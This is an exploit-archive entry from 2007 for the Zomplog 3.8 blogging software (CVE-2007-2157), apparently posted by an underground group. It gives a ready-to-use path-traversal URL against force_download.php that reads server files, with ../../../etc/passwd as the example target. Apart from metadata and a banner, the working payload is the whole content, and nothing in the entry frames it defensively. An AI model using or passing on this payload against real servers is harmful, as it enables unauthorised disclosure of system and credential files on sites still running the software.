Zomplog 3.8 - 'force_download.php' Remote File Disclosure
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-04-17
date_updated:
verified: 1
codes: OSVDB-35016;CVE-2007-2157
tags:
aliases:
screenshot_url:
application_url:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Y! Underground Group +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Portal......: Zomplog v3.8 +
+ Author......: Dj7xpl / Dj7xpl@Yahoo.com +
+ Type........: Remote File Disclosure Vulnerability +
+ Download....: www.zomp.nl/zomplog +
+ Page........: http://Dj7xpl.2600.ir +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path] +
+ E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2007-04-18]